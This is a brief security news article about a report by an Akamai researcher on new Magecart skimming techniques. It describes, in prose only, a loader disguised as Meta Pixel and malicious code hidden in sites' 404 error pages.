Highlights:

  • The malware leverages the loader stage to directly embed its code into the web server’s pages.
  • One of the factors contributing to Magecart’s persistence is the continuous adaptation and evolution of its attack strategies by its operators.

The malware group that created Magecart is still at the forefront of being undetectable.

This week, Roman Lvovsky, an Israeli security researcher at Akamai Technology, released a report detailing three obfuscation techniques recently detected by their telemetry. Magecart has been active for years, infecting numerous e-commerce websites, most notably Magento and WooCommerce-based sites. Targeted by these new methods are websites operated by food and other retailers.

There are three stages of the operators’ workflow for Magecart. Many code analyzers will not immediately identify the injected code, making it more difficult to detect and eliminate. Additionally, the workflow makes it simpler to conceal the entire assault infrastructure and command servers, thereby extending the duration of the attack.

The injector stage is utilized by the malware to insert its code directly into the web server’s pages. In subsequent phases, data such as credit card numbers and passwords are stolen.

According to Lvovsky, at least, one of the techniques is novel and unprecedented. “It really surprised us,” he wrote in his blog post.

The first-stage loader is disguised as a legitimate Facebook visitor and advertising monitoring service, Meta Pixel, which is extensively employed. The code readily evades malware detection tools.

This method is risky because later phases seem to call up a 404 error page for a bad URL location. These pages are annoying and frequently visited by website visitors, but they also contain a piece of hidden malware. He wrote, “It was initially confusing and made us wonder if the skimmer was no longer active on the victim websites we found.”

However, a comprehensive investigation of the 404 code revealed the actual attack processes concealed in a comment string. Lvovsky discovered that the perpetrator had alerted the default 404 error page script so that any website error would result in the infected page being displayed. This is quite ingenious and demonstrates that it can be accessed by a variety of Magecart operators’ data-stealing and attack-concluding tools.

One of the reasons for Magecart’s tenacity is that its operators continually evolve their assault methods, becoming more sophisticated and dangerous as they discover more effective evasion techniques. Perhaps users will now scrutinize even their error pages for potential sources of danger.